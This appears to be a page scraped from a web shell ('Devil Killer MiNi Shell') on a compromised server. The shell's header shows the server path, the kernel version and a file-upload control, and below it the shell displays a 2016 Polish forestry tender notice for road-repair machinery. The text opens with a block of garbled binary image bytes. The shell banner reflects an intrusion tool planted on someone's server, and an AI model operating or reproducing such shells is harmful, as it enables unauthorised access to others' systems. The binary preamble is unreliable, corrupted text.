JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161106/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161106/337123-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='bip.lasy.gov.pl/pl/bip/dg/rdlp_bialystok/nadl_zednia' target='_blank'>bip.lasy.gov.pl/pl/bip/dg/rdlp_bialystok/nadl_zednia</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 337123 - 2016
              z dnia 2016-11-06 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Michałowo: Dostawa: rorazdrabniarko  kruszarki przeznaczonej do remontu dróg leśnych, kosiarki wysięgnikowej (hydraulicznej) tylnej oraz łyżki do ładowacza czołowego Quicke 75.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                tak
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                tak
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                tak
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Nadleśnictwo Żednia, krajowy numer identyfikacyjny
              5002654900000, ul.
              Żednia 
              5,
              16050  
              Michałowo, woj.
              podlaskie, państwo
              Polska, tel.
              085 7175251, 7175252, e-mail
              , faks
              857 175 252.
              <br />
              Adres strony internetowej (URL): <br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Jednostka organizacyjna nie posiadająca osobowości prawnej</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />bip.lasy.gov.pl/pl/bip/dg/rdlp_bialystok/nadl_zednia</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br />Nadleśnictwo Żednia, Żednia 5, 16-050 Michałowo</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawa: rorazdrabniarko  kruszarki przeznaczonej do remontu dróg leśnych, kosiarki wysięgnikowej (hydraulicznej) tylnej oraz łyżki do ładowacza czołowego Quicke 75.<br /><b>Numer referencyjny: </b>S.270.20.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />3<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>OPIS PRZEDMIOTU ZAMÓWIENIA
CZĘŚĆ PIERWSZA:
1.	Przedmiotem zamówienia jest Dostawa rorazdrabniarko  kruszarki przeznaczonej do remontu dróg leśnych o określonych przez Kupującego parametrach technicznych.
2.	Wskazane parametry są parametrami minimalnymi, które musi rorazdrabniarko  kruszarka spełniać. 


WYMAGANIA OGÓLNE	OPISAĆ PARAMETR (TAK/NIE)
Maszyna fabrycznie nowa	
Maszyna przystosowana do współpracy z ciągnikiem o mocy znamionowej wg normy ISO 14369 nie mniejszej jak 129 KW i nie większej jak 155 KW  	
Rok produkcji  2016	
Dopuszczony do pracy w Polsce i w krajach Unii Europejskiej	

WYMAGANIA EKSPLOATACYJNE:	OPISAĆ PARAMETR (TAK/NIE)
Miejsce pracy  drogi leśne, powierzchnie zrębowe, linie oddziałowe i pasy p. poż.	
Przeznaczony do:
a) Remontu, renowacji dróg leśnych (kamienistych i żwirowych)
b) Rozdrabniania pozostałości pozrębowych.
c) Mineralizacji pasów p.poż.
d) Udostępniania linii oddziałowych.
	
Przewidywany okres eksploatacji 10 lat.	

WYMAGANE GŁÓWNE PARAMETRY TECHNICZNE.:	OPISAĆ PARAMETR (TAK/NIE)
Szerokość robocza  2450 mm	
Szerokość całkowita 2900  3000mm	
Głębokość robocza nie mniejsza niż 250 mm	
Masa maszyny 1800 do 2000 kg.	
Maksymalne chwilowe zapotrzebowanie mocy nie większe niż 155 KW.	

WYMAGANE STANDARDOWE ELEMENTY WYBRANE Z KATALOGÓW OFEROWANYCH PRZEZ PRODUCENTÓW.:	OPISAĆ PARAMETR (TAK/NIE)
Elementy robocze stałe (noże, frezy) zamocowane do bębna roboczego w osadach ( z końcówkami widiowymi)    i obracające się wokół własnej osi  dla zapewnienia równomiernego ich zużycia (wymienne do pracy w lesie i na drogach).	
Średnica rotora roboczego  min. 500 mm	
Obroty rotora roboczego w kierunku współbieżnym	
Ilość elementów roboczych zapewniająca całkowite pokrycie rozdrabnianej powierzchni ( nie mniej niż          90 sztuk).	
Rama główna wzmocniona typu  HARDOX do pracy w ciężkich warunkach	
Napęd z przekładni głównej dwustronny poprzez przekładnie łańcuchowe, pracujące  w kąpieli olejowej.	
Wbudowane dwa sprzęgła hydrauliczne  przeciążeniowe do zabezpieczenia układu przeniesienia napędu na bęben roboczy.	
Przeciwnóż do kruszenia współbieżnego  i przeciwbieżnego, zamocowany w ramie maszyny.	
Regulacja głębokości mieszania kruszonej nawierzchni przy pomocy ustalania pozycji bębna ugniatającego, sterowanego oddzielnym układem hydraulicznym.	
Wyposażenie  wał teleskopowo - przegubowy (Cardana)  dostosowany do mocy ciągnika	
Urządzenie wyposażone jest we wszystkie niezbędne połączenia oraz końcówki umożliwiające podłączenie go do ciągników Valtra 180 i 190. 	

WYMAGANE WARUNKI GWARANCJI I OBSŁUGI POGWARANCYJNEJ:	OPISAĆ PARAMETR (TAK/NIE)
Gwarancji udziela Wykonawca zamówienia na okres nie krótszy jak 24 miesiące.	
Wykonawca zabezpieczy serwis techniczny w miejscu pracy przedmiotu zamówienia.	
Udzielona gwarancja obejmuje wady fizyczne i prawne rzeczy sprzedanej w rozumieniu przepisów kodeksu cywilnego	
Wykonawca zobowiązany jest do wskazania w złożonej ofercie autoryzowanego przedstawiciela do zapewnienia kompleksowego serwisu gwarancyjnego i pogwarancyjnego oraz zabezpieczenia części zamiennych.	

WYMAGANA DOKUMENTACJA PRZY DOSTAWIE:	OPISAĆ PARAMETR (TAK/NIE)
Instrukcja eksploatacji i obsługi w języku polskim.	
Książka serwisowa	
Karta gwarancyjna	
Katalog części zamiennych	
Deklaracja zgodności CE/WE dopuszczająca kruszarkę do obrotu na terenie na terenie Unii Europejskiej	
Szczegółowa dokumentacja techniczna, folder i zdjęcie oferowanego przedmiotu zamówienia.	




WYMAGANE SZKOLENIE:	OPISAĆ PARAMETR (TAK/NIE)
W miejscu dostawy maszyny wskazanym przez Zamawiającego, Wykonawca przeprowadzi szkolenie dla dwóch
operatorów w zakresie obsługi, bezpieczeństwa Pracy i konserwacji.          Czas trwania szkolenia  jeden dzień roboczy podzielony na część teoretyczną i praktyczną.	

CZĘŚĆ DRUGA:
1.	Przedmiotem zamówienia jest Dostawa ramienia wysięgnikowego (z własnym układem hydraulicznym) tylne z głowicą koszącą  o określonych przez Kupującego parametrach technicznych.
2.	Wskazane parametry są parametrami minimalnymi, które musi ramienia wysięgnikowego (z własnym układem hydraulicznym) tylnego z głowicą koszącą spełniać. 


WYMAGANIA OGÓLNE	OPISAĆ PARAMETR (TAK/NIE)
Maszyny fabrycznie nowe	
Maszyny przystosowane do współpracy z ciągnikiem Valtra 180 i 190  	
Rok produkcji  2016	
Dopuszczony do pracy w Polsce i w krajach Unii Europejskiej	

WYMAGANIA EKSPLOATACYJNE:	OPISAĆ PARAMETR (TAK/NIE)
I GŁOWICA KOSZĄCA	
Miejsce pracy  pobocza dróg leśnych	
Przeznaczony do koszenia trawy i odrostów drzew i krzewów do 80 mm średnicy	
Przewidywany okres eksploatacji 10 lat.	
II RAMIĘ WYSIĘGNIKOWE TYLNE Z WŁASNYM UKŁADEM HYDRAULICZNYM	
Miejsce pracy  pobocza dróg leśnych	
Przystosowane do montażu głowic wymiennych 	
Przewidywany okres eksploatacji 10 lat.	

WYMAGANE GŁÓWNE PARAMETRY TECHNICZNE.:	OPISAĆ PARAMETR (TAK/NIE)
I GŁOWICA KOSZĄCA	
Szerokość głowicy roboczej minimum  1200 mm	
Element roboczy głowicy - nóż typu młoteczek o masie minimum 1,0 kg	
Spiralne ułożenie noży wału bijakowego głowicy	
Prędkość rotora koszącego minimum 3000 obr/min
	
II RAMIĘ WYSIĘGNIKOWE TYLNE Z WŁASNYM UKŁADEM HYDRAULICZNYM	
Zasięg poziomy ramienia z głowicą miniumum 550 cm	
Centralne mocowanie głowicy, oraz możliwość ustawienia jej kąta pracy	
Ramię wyposażone w szybkozłącza hydrauliczne 	
Możliwość montażu innych głowic roboczych: piła tarczowa, odmularka do rowów, równiarka do poboczy	
Przesunięcie ramienia z głowicą do przodu ciągnika miniumum 250 cm od kąta prostego ramienia  widoczność głowicy koszącej przy boku kabiny Ciągnika	
Obrót ramienia głowicy minimum 90 stopni do tyłu, zabezpieczenie najechania na przeszkodę ( bezpiecznik hydrauliczny )	
Zasięg poziomy od osi Ciągnika do głowicy wysuniętej min 250 cm do przodu ciągnika, powinien wynosić min 550 cm	
Płynne kopiowanie głowicy, amortyzacja ramienia	
Hydrauliczne odciążenie ramienia  	
Rzeczywista moc hydrauliczna hydromotoru głównego min. 45 KM	
Moc na silniku hydraulicznym rotora tnącego min. 40 KM	

WYMAGANE STANDARDOWE ELEMENTY WYBRANE Z KATALOGÓW OFEROWANYCH PRZEZ PRODUCENTÓW.:	OPISAĆ PARAMETR (TAK/NIE)
I GŁOWICA KOSZĄCA	
Głowica do trawy i krzewów z rewersem obrotów	
Waga głowicy maksymalnie 310 kg	
II RAMIĘ WYSIĘGNIKOWE TYLNE Z WŁASNYM UKŁADEM HYDRAULICZNYM	
Wydajność oleju 85l/min	
Waga maszyny maksymalnie 1300 kg 
Pojemność zbiornika oleju minimum 190 litrów	
Chłodnica oleju z termostatem	
Wskaźnik temperatury i poziomu oleju	
Sterowania elektryczne za pomocą joysticka	
Dodatkowe stabilizatory maszyny na trój-punkcie pozwalające uzyskać 5 punktowy system mocowania i stabilizacji ramienia kosiarki	
Urządzenie wyposażone jest we wszystkie niezbędne połączenia oraz końcówki umożliwiające podłączenie go do ciągników Valtra 180 i 190.	
Tablice ostrzegawcze	
Oświetlenie drogowe	

WYMAGANE WARUNKI GWARANCJI I OBSŁUGI POGWARANCYJNEJ:	OPISAĆ PARAMETR (TAK/NIE)
Gwarancji udziela Wykonawca zamówienia na okres nie krótszy jak 24 miesiące.	
Wykonawca zabezpieczy serwis techniczny w miejscu pracy przedmiotu zamówienia.	
Udzielona gwarancja obejmuje wady fizyczne i prawne rzeczy sprzedanej w rozumieniu przepisów kodeksu cywilnego	
Wykonawca zobowiązany jest do wskazania w złożonej ofercie autoryzowanego przedstawiciela do zapewnienia kompleksowego serwisu gwarancyjnego i pogwarancyjnego oraz zabezpieczenia części zamiennych.	





WYMAGANA DOKUMENTACJA PRZY DOSTAWIE:	OPISAĆ PARAMETR (TAK/NIE)
Instrukcja eksploatacji i obsługi w języku polskim.	
Książka serwisowa	
Karta gwarancyjna	
Katalog części zamiennych	
Deklaracja zgodności CE/WE dopuszczająca  ramienia wysięgnikowego (z własnym układem hydraulicznym) tylnego z głowicą koszącą do obrotu na terenie na terenie Unii Europejskiej	
Szczegółowa dokumentacja techniczna, folder i zdjęcie oferowanego przedmiotu zamówienia.	



WYMAGANE SZKOLENIE:	OPISAĆ PARAMETR (TAK/NIE)
W miejscu dostawy maszyny wskazanym przez Zamawiającego, Wykonawca przeprowadzi szkolenie dla dwóch operatorów w zakresie obsługi, bezpieczeństwa Pracy i konserwacji. Czas trwania szkolenia  jeden dzień roboczy podzielony na część teoretyczną i praktyczną.	



CZĘŚĆ TRZECIA:
1.	Przedmiotem zamówienia jest Dostawa  łyżki  do ładowacza czołowego Quicke 75 o określonych przez Kupującego parametrach technicznych.
2.	Wskazane parametry są parametrami minimalnymi, które musi łyżka  do ładowacza czołowego Quicke 75  spełniać. 

WYMAGANIA OGÓLNE	OPISAĆ PARAMETR (TAK/NIE)
Urządzenie fabrycznie nowe	
Urządzenie przystosowane do współpracy z ładowaczem czołowym Quicke 75  	
Rok produkcji  2016	
Dopuszczony do pracy w Polsce i w krajach Unii Europejskiej	

WYMAGANIA EKSPLOATACYJNE:	OPISAĆ PARAMETR (TAK/NIE)
Miejsce pracy  drogi leśne, posesje czyszczenie placów i rowów.	
Przeznaczony do:
a) Remontu, renowacji dróg leśnych 
b) Czyszczenia placów.
c) Załadunek materiałów sypkich.	
Przewidywany okres eksploatacji 10 lat.	

WYMAGANE GŁÓWNE PARAMETRY TECHNICZNE.:	OPISAĆ PARAMETR (TAK/NIE)
Szerokość robocza  1850 mm	
Pojemność łyżki  700 -750 l.	
Masa łyżki do 220 kg.	
Mocowanie typu Euro - ramka	

WYMAGANE STANDARDOWE ELEMENTY WYBRANE Z KATALOGÓW OFEROWANYCH PRZEZ PRODUCENTÓW.:	OPISAĆ PARAMETR (TAK/NIE)
Wymienne zęby robocze do spulchniania materiału	
Przeznaczona do ciężkich prac	
Zęby robocze do pracy również mniej sypkimi materiałami jak kamienie, grudy ziemi 	
Okrągłe dno łyżki	
Wzmocnienia boczne	
Dolna krawędź tnąca z możliwością montażu zębów 	
Urządzenie wyposażone jest we wszystkie niezbędne połączenia oraz końcówki umożliwiające podłączenie go do ładowacza czołowego Quicke 75.	

WYMAGANE WARUNKI GWARANCJI I OBSŁUGI POGWARANCYJNEJ:	OPISAĆ PARAMETR (TAK/NIE)
Gwarancji udziela Wykonawca zamówienia na okres nie krótszy jak 24 miesiące.	
Wykonawca zabezpieczy serwis techniczny w miejscu pracy przedmiotu zamówienia.	
Udzielona gwarancja obejmuje wady fizyczne i prawne rzeczy sprzedanej w rozumieniu przepisów kodeksu cywilnego	
Wykonawca zobowiązany jest do wskazania w złożonej ofercie autoryzowanego przedstawiciela do zapewnienia kompleksowego serwisu gwarancyjnego i pogwarancyjnego oraz zabezpieczenia części zamiennych.	

WYMAGANA DOKUMENTACJA PRZY DOSTAWIE:	OPISAĆ PARAMETR (TAK/NIE)
Instrukcja eksploatacji i obsługi w języku polskim.	
Książka serwisowa	
Karta gwarancyjna	
Katalog części zamiennych	
Deklaracja zgodności CE/WE dopuszczająca łyżkę do obrotu na terenie na terenie Unii Europejskiej	
Szczegółowa dokumentacja techniczna, folder i zdjęcie oferowanego przedmiotu zamówienia.	

WYMAGANE SZKOLENIE:	OPISAĆ PARAMETR (TAK/NIE)
W miejscu dostawy maszyny wskazanym przez Zamawiającego, Wykonawca przeprowadzi szkolenie dla dwóch
operatorów w zakresie obsługi, bezpieczeństwa Pracy i konserwacji.          Czas trwania szkolenia  cztery godziny robocze podzielone na część teoretyczną i praktyczną.	


<br /><br /><b>II.5) Główny kod CPV: </b><br /><b> Dodatkowe kody CPV:</b>43300000-6,
                16310000-1,
                16810000-6<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 30<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Podany termin realizacji zamówienia może ulec zmianie wyłącznie na warunkach określonych w umowie</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia w tym zakresie żadnych wymagań<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie stawia w tym zakresie żadnych wymagań<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                część I 
	Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie): zrealizował co najmniej 1 dostawę kruszarki przeznaczonej do remontu dróg leśnych.
część II 
	Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie): zrealizował co najmniej 1 dostawę  kosiarki wysięgnikowej (hydraulicznej) tylnej.
część III  
2.	Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie): zrealizował co najmniej 1 dostawę do ładowacza czołowego Quicke 75. zamawiający może, na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. 
3.	W przypadku wspólnego ubiegania się o zamówienie na zasadach określonych w art. 23 PZP wykonawcy muszą łącznie wykazać spełnianie warunków uczestnictwa, o których mowa w punkcie 5.1.2. 
4.	Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.
5.	Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.
6.	Zamawiający ocenia, czy udostępniane wykonawcy przez inne podmioty zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez wykonawcę spełniania warunków udziału w postępowaniu oraz bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, o których mowa w art. 24 ust. 1 pkt 1322 i ust. 5 ustawy Prawo zamówień publicznych.
7.	Jeżeli zdolności techniczne lub zawodowe lub sytuacja ekonomiczna lub finansowa, podmiotów udostępniających zasoby lub zachodzą wobec tych podmiotów podstawy wykluczenia, zamawiający żądać będzie, aby wykonawca w terminie określonym przez zamawiającego:
1)  zastąpił ten podmiot innym podmiotem lub podmiotami lub
2)  zobowiązał się do osobistego wykonania odpowiedniej części zamówienia, jeżeli wykaże zdolności techniczne lub zawodowe lub sytuację finansową lub ekonomiczną, o których mowa w pkt. 5.5.
<br />
